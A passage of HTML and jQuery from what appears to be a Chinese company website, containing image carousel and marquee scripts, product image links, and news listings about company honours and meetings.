                this.updateFaceBottonTopImg(index);
                this.config.flick.eq(index).addClass("on").siblings().removeClass("on");
                break;
        }
    };

    /*
     * ********************************************
     * 3D旋转效果 特有函数 begin
     */
    // 每次旋转前都需要更新背部的图片
    Banner.prototype.updateBgImg = function() {
        // 计算背部要显示的图片
        var bg_image_index = this.nextIndex(this.nextIndex());
        // index: 计算背景图片当前显示在哪个img中( 总共有4个图片, 分别位于正面/底部/背部/顶部, 索引分别为0, 1, 2, 3 )
        var c, index = (c = (this.rotate + 2) % 4) >= 0 ? c : c + 4;
        var banner = this;
        // console.log('第',index,'个面-使用更新为第',bg_image_index,'张图');
        this.parts && this.parts.each(function () {
            $(this).find('.img:eq('+index+')').css({'background-image': 'url("'+banner.config.list[bg_image_index]+'")'});

        });
    };
    // 更新正面/顶部/底部的图片
    // index: 要显示哪张图片
    // 备注: 因为总共有四个面的图片需要更新, 初始化时, 正面/顶部/底部的图片只需更新一次即可 (背部的图片在每次旋转前都需要更新)
    Banner.prototype.updateFaceBottonTopImg = function(index) {
        // face, bottom, top: 计算正面/顶部/底部图片当前显示在哪个img中( 总共有4个图片, 分别位于正面/底部/背部/顶部, 索引分别为0, 1, 2, 3 )
        var c, face = (c = this.rotate % 4) >= 0 ? c : c + 4, bottom, top;
        bottom = face + 1; bottom >= this.config.length && (bottom = 0);
        top = face - 1; top < 0 && (top = this.config.length - 1);
        var banner = this;
        this.parts && this.parts.each(function () {
            // console.log('第',face,'个面-使用更新为第',index,'张图');
            $(this).find('.img:eq('+face+')').css({'background-image': 'url("'+banner.config.list[index]+'")'});
            // console.log('第',bottom,'个面-使用更新为第',index < banner.config.length - 1 ? index + 1 : 0,'张图');
            $(this).find('.img:eq('+bottom+')').css({'background-image': 'url("'+banner.config.list[index < banner.config.length - 1 ? index + 1 : 0]+'")'});
            // console.log('第',top,'个面-使用更新为第',index > 0 ? index - 1 : banner.config.length - 1,'张图');
            $(this).find('.img:eq('+top+')').css({'background-image': 'url("'+banner.config.list[index > 0 ? index - 1 : banner.config.length - 1]+'")'});
        });
    };
    // 初始化旋转部分: 设置3d旋转的四个面的图片, index表示默认显示哪张图片
    Banner.prototype.initImgPart = function(index) {
        var banner = this;
        this.parts && this.parts.each(function () {
            $(this).find('.img').each(function (i) {
                var j = 0;
                switch (i) {
                    case 0: j = index; break;   // 正面
                    case 1: j = index + 1; break;   // 底部
                    case 2: break;  // 背部
                    case 3: j = index - 1; break;   // 顶部
                }
                j >= banner.config.length && (j = 0);
                j < 0 && (j = banner.config.length - 1);
                $(this).css({'background-image': 'url("'+banner.config.list[j]+'")', 'background-repeat':'no-repeat', 'background-color':'#fff'});
            });
        });
    };
    // 更新旋转部分: 之所以使用定时器, 是因为无法实时获取模块宽度
    Banner.prototype.updateImgPart = function() {
        this.parts && this.parts.each(function(index) {
            $(this).css({
                "left":$(this).width() * index + "px"
            });
            $(this).find(".img").css({
                "background-position": -$(this).width() * index + "px"
            });
        });
        var banner = this;
        setTimeout(function () {
            banner.updateImgPart();
        }, 800);
    };
    /*
     * 3D旋转效果 特有函数 end
     * ********************************************
     */

    // 图片数据
    var list_banner_style_01_1567612498400 = [];
    list_banner_style_01_1567612498400.push('/uploadfile/20231106/145ffc0445d712796d9ea91bbc9e3081.jpg','/uploadfile/20231106/52f61fc80bcbaa6527554cd688aa5f34.jpg','/uploadfile/20231106/e374ee39b7e8e7f5911594b7c29644fd.jpg','/uploadfile/20231106/7ab0f3401d1959f5129596f0886c1505.jpg','/uploadfile/20231106/42ebe32c214bb5874f52e7f9a88c2878.jpg','/uploadfile/20231106/b144c28f5a49106ff28e9650d2e2afd7.jpg','/uploadfile/20231106/45e1f02656cdb1255fb7040e7ee2bb89.jpg','/uploadfile/20231106/b2fea9ea22d1a23cac3b559907ad8d09.jpg',);
    var banner_banner_style_01_1567612498400;        // 轮播图对象

    $(function(){
        // 创建轮播图
        $arrHref = new Array();
        banner_banner_style_01_1567612498400 = new Banner({
            'list':list_banner_style_01_1567612498400,
            'view':$('#banner_style_01_1567612498400'),
            'duration':parseFloat('3') * 1000,
            'animation':parseFloat('0.5') * 1000
        });
                banner_banner_style_01_1567612498400.animateStyle = 'normal';
        banner_banner_style_01_1567612498400.imgs = banner_banner_style_01_1567612498400.view.find(".bannerStyle_1 .main_image .img-list").children(".img-item");
        banner_banner_style_01_1567612498400.view.find('a').each(function (i) {
            $(this).click(function () {
                if(!$(this).attr('href')) {
                    return false;
                }
            });
           
        });
        banner_banner_style_01_1567612498400.view.find('a.picSet').each(function(i){
             $arrHref[i] = $(this).attr('href');
        });
        console.log($arrHref);
                
        // 显示指定索引的图片
        banner_banner_style_01_1567612498400.showIndex(banner_banner_style_01_1567612498400.config.current);


        // 监听 点击圆点
        banner_banner_style_01_1567612498400.config.flick.click(function(){
            banner_banner_style_01_1567612498400.animateIndex($(this).index());
            $('#banner_style_01_1567612498400 a.img_url').attr('href',$url_html[$(this).index()]);
            $i = $(this).index();
            return false;
        });

        // 监听 鼠标悬浮时
        banner_banner_style_01_1567612498400.view.hover(
                function(){
                    banner_banner_style_01_1567612498400.endAnimate();
                    banner_banner_style_01_1567612498400.view.find(".bannerStyle_1 .btn_prev, .bannerStyle_1 .btn_next").fadeIn();
                },
                function(){
                    banner_banner_style_01_1567612498400.config.timer = setTimeout(function(){
                        banner_banner_style_01_1567612498400.startAnimateRight();
                    },banner_banner_style_01_1567612498400.config.duration);
                    banner_banner_style_01_1567612498400.view.find(".bannerStyle_1 .btn_prev, .bannerStyle_1 .btn_next").fadeOut()
                }
        );

        // 监听 点击左右按钮
        banner_banner_style_01_1567612498400.view.find(".btn_prev").click(function() {
            banner_banner_style_01_1567612498400.startAnimateLeft();
        });
        banner_banner_style_01_1567612498400.view.find(".btn_next").click(function() {
            banner_banner_style_01_1567612498400.startAnimateRight();
        });

        // 监听 触摸事件
        var touchVal = null;
        document.addEventListener("touchstart", function(e){
            if($(e.target).is(banner_banner_style_01_1567612498400.view) || $(e.target).closest("#"+banner_banner_style_01_1567612498400.view.attr("id")).length > 0) {
                touchVal = {};
                touchVal.downX = e.touches[0].clientX;  // 记录触摸起始位置
                // if (e.preventDefault) {
                //  e.preventDefault();
                // } else {
                //  e.returnvalue = false;
                // }
            }
        }, false);
        document.addEventListener("touchmove", function(e){
            if(touchVal && touchVal.downX) {
                touchVal.moveX = e.touches[0].clientX - touchVal.downX;     // 计算触摸中的偏移位置
                // if (e.preventDefault) {
                //  e.preventDefault();
                // } else {
                //  e.returnvalue = false;
                // }
            }
        }, false);
        document.addEventListener("touchend", function(e){
            if(touchVal && touchVal.moveX){
                if(touchVal.moveX > 30){
                    banner_banner_style_01_1567612498400.startAnimateLeft();             // 触摸生效
                    if (e.preventDefault) {
                        e.preventDefault();
                    } else {
                        e.returnvalue = false;
                    }
                }else if(touchVal.moveX < -30){
                    banner_banner_style_01_1567612498400.startAnimateRight();                // 触摸生效
                    if (e.preventDefault) {
                        e.preventDefault();
                    } else {
                        e.returnvalue = false;
                    }
                }
            }
            touchVal = null;
        }, false);

       
        // 运行
        banner_banner_style_01_1567612498400.config.timer = setTimeout(function(){
            banner_banner_style_01_1567612498400.startAnimateRight();
        }, banner_banner_style_01_1567612498400.config.duration);
    });

</script>




        </div>
      </div>
















      </div>



















    <div id="layout_1556245573967" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents">
        <div id="div_blank_new01_1556245573968" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div class="blank_new01">
              <div class="roundcs modSet"></div>
            </div>
          </div>
        </div>
        <div id="text_style_01_1556245573976" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents mkan" style="color:#fff">Products</div></div>
        <div id="text_style_01_1556245573978" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents"><!-- Product center --></div></div>
      </div>
    </div>
    <div id="layout_1556246014813" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents">
        <div id="banner_style_04_1556246023334" class="view style_04 banner  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="banner" class="view_contents">
            <script></script>
            <div class="bannerStyle_4">
              <!-- imgMove -->
              <div class="imgMove" id="banner_style_04_1556246023334imgMove">
                <div class="subMove">

                  <ul id="banner_style_04_1556246023334itemOne">

                            <li>
                      <a href="/product/675.html">
                        <img src="/uploadfile/20191017/3885d6a220ec179e05cd924e2d78506f.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/674.html">
                        <img src="/uploadfile/20191017/0ac34926f3e5a069b6cba7e994bd586a.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/673.html">
                        <img src="/uploadfile/20191017/c7864f84310af317310b6e553f7ff75e.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/672.html">
                        <img src="/uploadfile/20191017/f289fb2ff90f21b54a0e81afed9af401.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/671.html">
                        <img src="/uploadfile/20191017/4e1d7549120e61993e9e1ec7fa1daf68.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/670.html">
                        <img src="/uploadfile/20191017/6817a86e579d3ef7a86937e283afd2ce.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/669.html">
                        <img src="/uploadfile/20191017/1ced86fafe70ab7c88a80d8db69536c3.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/668.html">
                        <img src="/uploadfile/20191017/f3f8ee5810cbba745c6c180fa019dd71.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/667.html">
                        <img src="/uploadfile/20191017/9375a7962f14224e70d8f37e19815b4e.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/666.html">
                        <img src="/uploadfile/20191017/57bf74f0aed1166528703eed1755d89b.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/665.html">
                        <img src="/uploadfile/20191017/485c15b364603d01c82357edf66a09db.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/664.html">
                        <img src="/uploadfile/20191017/c3adbb675d62be2c061cb1be4fc95de3.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/663.html">
                        <img src="/uploadfile/20191017/43be0e14af423e8297289c7257e33956.jpg"></a>
                    </li>
                            <li>
                      <a href="/product/662.html">
                        <img src="/uploadfile/20191017/ee95da93ce18397a75b8fe4af30432ef.jpg"></a>
                    </li>
        
                  </ul>

                  <ul id="banner_style_04_1556246023334itemTwo">

                  </ul>

                  <ul id="banner_style_04_1556246023334itemThree">

                  </ul>

                </div>
              </div>
            </div>
            <!-- JavaScript -->
            <script type="text/javascript">$(document).stop().ready(function() {

                //-imgMove全局定义
                var flag = 2; //控制是否放大的开启
                console.log("sss:" + 10 + "");
                var speed = "" + 10 + "";
                var itemMove = document.getElementById("banner_style_04_1556246023334imgMove");
                var itemOne = document.getElementById("banner_style_04_1556246023334itemOne");
                var itemTwo = document.getElementById("banner_style_04_1556246023334itemTwo");
                var itemThree = document.getElementById("banner_style_04_1556246023334itemThree");
                itemTwo.innerHTML = itemOne.innerHTML;
                itemThree.innerHTML = itemOne.innerHTML;
                var imgScroll = setInterval(Marquee, speed);

                if (flag == 1) {
                  var banner4BoxHtml = $("<div class='banner4Box'><div class='boxExit'><img src='img/banner/style_04/hover_close.png'/></div><div class='subBox'><div class='boxCon'><div class='boxBefore'><img src='img/banner/style_04/hover_left.png'/></div><div class='boxAfter'><img src='img/banner/style_04/hover_right.png'/></div><ul class='boxScroll' id='boxScroll'></ul></div></div></div>");
                  $("body").append(banner4BoxHtml);
                  flag = 0;
                }
                try {
                  var boxScrollHtml = document.getElementById("boxScroll");
                  boxScrollHtml.innerHTML = itemTwo.innerHTML;
                  $("#boxScroll").prepend("<li><a><img src='img/upimages/2019-06-30_234211.png'/></a></li>");
                  $("#boxScroll").append("<li><a><img src='img/upimages/20190630234135707.jpg'/></a></li>");
                } catch(err) {}

                //-banner4Box全局定义
                var moveLeft;
                var imgWidth;
                var imgHeight;
                var screenWidth;
                var screenHeight;
                var imgIndex = $('.boxScroll').children('li').length;
                var imgMax = imgIndex - 2;

                //imgMove-function
                function Marquee() {

                  if (itemTwo.offsetWidth - itemMove.scrollLeft <= 0) itemMove.scrollLeft = itemMove.scrollLeft - itemTwo.offsetWidth;
                  else {
                    itemMove.scrollLeft++;
                  }
                }
                $('#imgMove img').hover(function() {

                  clearInterval(imgScroll);
                },
                function() {

                  imgScroll = setInterval(Marquee, speed);
                });

                //退回imgMove
                $('.boxExit img').click(function() {

                  speed = 15;
                  imgScroll = setInterval(Marquee, speed);
                  $('.banner4Box').css({
                    'display': 'none'
                  });
                });

                //进入banner4Box
                $('#imgMove img').click(function() {

                  speed = 999999;
                  imgIndex = $(this).parent().parent().index();
                  $('.banner4Box').css({
                    'display': 'block'
                  });
                  $(window).resize();
                });

                $(window).resize(function() {

                  imgWidth = $('.boxCon').width();
                  imgHeight = $('.boxCon').height();
                  screenWidth = $(document).width();
                  screenHeight = $(document).height();

                  if (screenWidth > screenHeight) {
                    imgWidth = imgHeight * 3 / 2;
                  } else {
                    imgWidth = screenWidth * 0.6;
                    imgHeight = imgWidth * 2 / 3;
                  }

                  imgIndex++;
                  moveLeft = '-' + imgIndex * imgWidth;
                  $('.boxScroll').stop().animate({
                    left: moveLeft
                  },
                  500);
                  $('.boxScroll').css({
                    'width': (imgMax + 2) * 100 + '%',
                    'left': -imgWidth + 'px'
                  });
                  $('.boxCon').css({
                    'width': imgWidth
                  });
                  $('.subBox').css({
                    'height': imgHeight
                  });
                });

                //banner4Box-function
                $('.boxAfter').click(function() {

                  imgIndex++;
                  if (imgIndex > imgMax) {
                    imgIndex = 1;
                    $('.boxScroll').css('left', '0px');
                    $('.boxScroll').stop().animate({
                      left: -imgIndex * imgWidth
                    },
                    500);
                  } else {
                    $('.boxScroll').stop().animate({
                      left: -imgIndex * imgWidth
                    },
                    500);
                  }
                });
                $('.boxBefore').click(function() {

                  imgIndex--;
                  if (imgIndex < 1) {
                    imgIndex = imgMax;
                    $('.boxScroll').css('left', -(imgMax + 2) * imgWidth + 'px');
                    $('.boxScroll').stop().animate({
                      left: -imgIndex * imgWidth
                    },
                    500);
                  } else {
                    $('.boxScroll').stop().animate({
                      left: -imgIndex * imgWidth
                    },
                    500);
                  }
                });
                if (typeof(imgLazyloadLib) == "function") imgLazyloadLib($("#banner_style_04_1556246023334imgMove img"));
              });</script>
          </div>
        </div>
      </div>
    </div>




    <div id="layout_1556176905009" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents">
        <div id="newsList_style_18_1556181385586" class="view style_18 newsList  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="newsList" class="view_contents">
            <!--新闻列表区域-->
            <!--pageSet pagecurSet-->
            <div class="boxNewsListStyle_18">
              <ul id="boxNewsList">


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/958.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/956.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/955.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/954.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/953.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/952.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/951.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/950.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/949.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/948.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/947.html" target="_self">· ...</a>
                        <span class="newsTime timesSet">
                          <span class="nDate">2025-10-09</span></span>
                      </div>
                    </div>
                  </div>
                </li>  


              

              </ul>
            </div>
            <!--新闻列表区域 结束-->
            <style>#newsList_style_18_1556181385586 .newDetail.pc {display:block;} #newsList_style_18_1556181385586 .newDetail.pad, #newsList_style_18_1556181385586 .newDetail.mobile {display:none;} #newsList_style_18_1556181385586 .newTitle.pc {display:block;} #newsList_style_18_1556181385586 .newTitle.pad, #newsList_style_18_1556181385586 .newTitle.mobile {display:none;} @media screen and (min-width:641px) and (max-width:1200px) { #newsList_style_18_1556181385586 .newDetail.pad {display:block;} #newsList_style_18_1556181385586 .newDetail.pc, #newsList_style_18_1556181385586 .newDetail.mobile {display:none;} #newsList_style_18_1556181385586 .newTitle.pad {display:block;} #newsList_style_18_1556181385586 .newTitle.pc, #newsList_style_18_1556181385586 .newTitle.mobile {display:none;} } @media screen and (max-width:640px) { #newsList_style_18_1556181385586 .newDetail.mobile {display:block;} #newsList_style_18_1556181385586 .newDetail.pc, #newsList_style_18_1556181385586 .newDetail.pad {display:none;} #newsList_style_18_1556181385586 .newTitle.mobile {display:block;} #newsList_style_18_1556181385586 .newTitle.pc, #newsList_style_18_1556181385586 .newTitle.pad {display:none;} }</style>
            <style>@media screen and (min-width: 1025px) { #newsList_style_18_1556181385586 .sumary_list .newPic{width: 0px;} #newsList_style_18_1556181385586 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1556181385586 .sumary_list .newCont{width: 100%;} } @media screen and (min-width: 640px) and (max-width: 1024px) { #newsList_style_18_1556181385586 .sumary_list .newPic{width: 0px;} #newsList_style_18_1556181385586 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1556181385586 .sumary_list .newCont{width: 100%;} } @media screen and (max-width: 640px) { } /* 新分页 */ #newsList_style_18_1556181385586 .page_btn{ font-size:14px; text-align: center;} #newsList_style_18_1556181385586 .page_btn .all_page{ display:inline-block; margin:0 10px; } #newsList_style_18_1556181385586 .page:hover{ background:red; color:white; cursor:pointer;} #newsList_style_18_1556181385586 .page_btn .cur{ background:red; color:white; cursor:pointer;} #newsList_style_18_1556181385586 .submit_div{ display: inline-block; } #newsList_style_18_1556181385586 .page_btn input{ width:50px; margin:0 5px;} #newsList_style_18_1556181385586 .page_btn input:hover{ cursor:default; background:white; color:#333;} #newsList_style_18_1556181385586 .page_submit{margin-left:5px;} #newsList_style_18_1556181385586 .page{display:inline-block; border:none; background:white; text-align: center; width:auto; padding:0 15px; margin:0 .5px; height:auto; line-height:35px; box-sizing: border-box; -webkit-box-sizing: border-box; border:1px solid #e5e5e5;} @media screen and (max-width:640px) { #newsList_style_18_1556181385586 .page_btn{ font-size:12px; } #newsList_style_18_1556181385586 .submit_div{ display:none; } } #newsList_style_18_1556181385586 .page{width:auto; margin:0 5px 10px 5px; border-radius:5px; } @media screen and (max-width:640px) { #newsList_style_18_1556181385586 .page{line-height:30px; padding:0 13px;} }</style></div>
        </div>
        <div id="banner_style_01_1561898707415" class="view style_08 banner  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="banner" class="view_contents">
            <script></script>
            <!--Banner区域-->


            <div id="banner" class="bannerStyle_8">
              <div class="main_visual">
                <div class="main_image">
                  <ul>

                                      <li style="display: none; float: none; left: 0%; top: 0px; position: absolute;">
                      <a href="/read/943" class="picSet">
                        <img src="/uploadfile/20250210/b822fdf2ead1c4a87c35cf87cde4eb9d.jpg" alt="公司蝉联曾都区推进高质量发展先进集体荣誉称号">
                        <div class="tipsText">
                          <span></span></div>
                      </a>
                    </li>
                                      <li style="display: none; float: none; left: 0%; top: 0px; position: absolute;">
                      <a href="/read/942" class="picSet">
                        <img src="/uploadfile/20250210/503c9fe0f2af14d1cb975588a57cf1b4.jpg" alt="公司荣获市级先进集体和先进个人双荣誉">
                        <div class="tipsText">
                          <span></span></div>
                      </a>
                    </li>
                                      <li style="display: none; float: none; left: 0%; top: 0px; position: absolute;">
                      <a href="/read/935" class="picSet">
                        <img src="/uploadfile/20250210/9c7e5bd1384f43dc7dc2233bfc4b28f6.jpg" alt="公司召开2025年工作会议暨一届三次职代会">
                        <div class="tipsText">
                          <span></span></div>
                      </a>
                    </li>
                                      <li style="display: none; float: none; left: 0%; top: 0px; position: absolute;">
                      <a href="/read/824" class="picSet">
                        <img src="/uploadfile/20240102/d0ce3e6189cf123620e08d766e1b26cf.jpg" alt="新年献词">
                        <div class="tipsText">
                          <span></span></div>
                      </a>
                    </li>
                                      <li style="display: none; float: none; left: 0%; top: 0px; position: absolute;">
                      <a href="/read/823" class="picSet">
                        <img src="/uploadfile/20231225/561a353cb49246152efad83116cfebdb.jpg" alt="【公司新闻】湖北新兴全力工会第一次会员代表大会胜利召开">
                        <div class="tipsText">
                          <span></span></div>
                      </a>
                    </li>
                  
<!-- 
                    <li style="float: none; left: 0%; top: 0px; position: absolute; display: none;">
                      <a href="javascript:;" class="picSet">
                        <img src="/static/index/20190724142256521.jpg" alt="黄石新兴开展不忘初心牢记使命主题教育">
                        <div class="tipsText">
                          <span>黄石新兴开展不忘初心牢记使命主题教育</span></div>
                      </a>
                    </li>
                    <li style="float: none; left: 0%; top: 0px; position: absolute; display: list-item;">
                      <a href="javascript:;" class="picSet">
                        <img src="/static/index/20190724142337149.jpg" alt="公司开展不忘初心 牢记使命主题教育动员会">
                        <div class="tipsText">
                          <span>公司开展不忘初心 牢记使命主题教育动员会</span></div>
                      </a>
                    </li>
                    <li style="float: none; left: 0%; top: 0px; position: absolute; display: none;">
                      <a href="javascript:;" class="picSet">
                        <img src="/static/index/20190724142412176.jpg" alt="黄石新兴廉洁教育及廉洁纪律知识考试">
                        <div class="tipsText">
                          <span>黄石新兴廉洁教育及廉洁纪律知识考试</span></div>
                      </a>
                    </li> -->
                  </ul>
                  <a href="javascript:;" id="btn_prev" style="display: none;"></a>
                  <a href="javascript:;" id="btn_next" style="display: none;"></a>
                </div>
              </div>
            </div>
            <script type="text/javascript">$(document).ready(function() {
                var dateSet = parseFloat('3') * 1000; //定义多少秒滚动，默认3秒
                var timeAnimi = parseFloat('0.5') * 1000; //定义多少毫秒动画时间，默认0.5秒
                var obj = $("#banner_style_01_1561898707415");
                if (obj && obj.length > 0) {
                  //初始化参数
                  var timeoutObj = null; //定义计时器
                  var nowItem = 0; //当前的
                  var father = obj.find(".bannerStyle_8 .main_image ul");
                  var Ulen = father.children("li").length;

                  //初始化视图
                  father.children("li").eq(nowItem).css({
                    "display": "block",
                    "float": "none",
                    "left": "0%",
                    "top": "0px",
                    "position": "absolute"
                  }).siblings("li").css({
                    "display": "none",
                    "float": "none",
                    "left": "0%",
                    "top": "0px",
                    "position": "absolute"
                  });
                  obj.hover(function() {
                    if (timeoutObj) {
                      window.clearTimeout(timeoutObj);
                    }
                    obj.find(".bannerStyle_8 #btn_prev, .bannerStyle_8 #btn_next").fadeIn()
                  },
                  function() {
                    timeoutObj = setTimeout(function() {
                      animiIn(animiIn);
                    },
                    dateSet);
                    obj.find(".bannerStyle_8 #btn_prev, .bannerStyle_8 #btn_next").fadeOut()
                  });
                  $(".bannerStyle_8 #btn_prev").click(function() {
                    animiOut();
                  });
                  $(".bannerStyle_8 #btn_next").click(function() {
                    animiIn();
                  });
                  var touchVal = null;
                  document.addEventListener("touchstart",
                  function(e) {
                    if ($(e.target).is(obj) || $(e.target).parents("#" + obj.attr("id")).length > 0) {
                      touchVal = {};
                      touchVal.downX = e.touches[0].clientX;
                      if (e.preventDefault) {
                        e.preventDefault();
                      } else {
                        e.returnvalue = false;
                      }
                    }
                  },
                  false);
                  document.addEventListener("touchmove",
                  function(e) {
                    if (touchVal && touchVal.downX) {
                      touchVal.moveX = e.touches[0].clientX - touchVal.downX;
                      if (e.preventDefault) {
                        e.preventDefault();
                      } else {
                        e.returnvalue = false;
                      }
                    }
                  },
                  false);
                  document.addEventListener("touchend",
                  function(e) {
                    if (touchVal && touchVal.moveX) {
                      if (touchVal.moveX > 30) {
                        animiOut(animiIn);
                      } else if (touchVal.moveX < -30) {
                        animiIn(animiIn);
                      }
                      if (e.preventDefault) {
                        e.preventDefault();
                      } else {
                        e.returnvalue = false;
                      }
                    }
                    touchVal = null;
                  },
                  false);
                  //定义进入事件
                  function animiIn(callback) {
                    if (timeoutObj) {
                      window.clearTimeout(timeoutObj);
                    }
                    if (Ulen > 1) {
                      //当个数大于1个的时候才会切换
                      var now = nowItem;
                      var next = now + 1;
                      if (next >= Ulen) {
                        next = 0;
                      }
                      father.children("li").eq(now).stop().fadeOut(timeAnimi,
                      function() {
                        if (typeof(callback) == "function") {
                          timeoutObj = setTimeout(function() {
                            callback(callback);
                          },
                          dateSet);
                        }
                      });
                      father.children("li").eq(next).stop(false, true).fadeIn(timeAnimi);
                      nowItem = next;
                    }
                  }
                  //定义离开事件
                  function animiOut() {
                    if (timeoutObj) {
                      window.clearTimeout(timeoutObj);
                    }
                    if (Ulen > 1) {
                      //当个数大于1个的时候才会切换
                      var now = nowItem;
                      var next = now - 1;
                      if (next < 0) {
                        next = Ulen - 1;
                      }
                      father.children("li").eq(now).stop().fadeOut(timeAnimi,
                      function() {
                        if (typeof(callback) == "function") {
                          timeoutObj = setTimeout(function() {
                            callback(callback);
                          },
                          dateSet);
                        }
                      });
                      father.children("li").eq(next).stop(false, true).fadeIn(timeAnimi);
                      nowItem = next;
                    }
                  }
                  //运行
                  timeoutObj = setTimeout(function() {
                    animiIn(animiIn);
                  },
                  dateSet);
                }
              });</script>
            Banner区域 end---></div>
        </div>
        <div id="div_blank_new01_1556180486684" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div class="blank_new01">
              <div class="roundcs modSet"></div>
            </div>
          </div>
        </div>
        <div id="text_style_01_1556180637766" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents mkan" style="color:#fff; width: auto; padding: 0 5px;">Company news</div></div>
        <div id="text_style_01_1556180682105" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents"><!-- Company News --></div></div>
      </div>
    </div>
    <div id="layout_1556181904429" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents"></div>
    </div>
    <div id="layout_1556182386189" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents">
        <div id="newsList_style_18_1556183214214" class="view style_18 newsList  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="newsList" class="view_contents">
            <!--新闻列表区域
            <!--pageSet pagecurSet-->
            <div class="boxNewsListStyle_18">
              <ul id="boxNewsList">


              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/920.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
                    <div class="newTitle ">
                      <div class="newName ">
                        <a class="titleSet" href="/read/919.html" target="_self">· ...</a></div>
                    </div>
                  </div>
                </li>

              
                <li class="sumary_list modSet">
                  <div class="newCont">
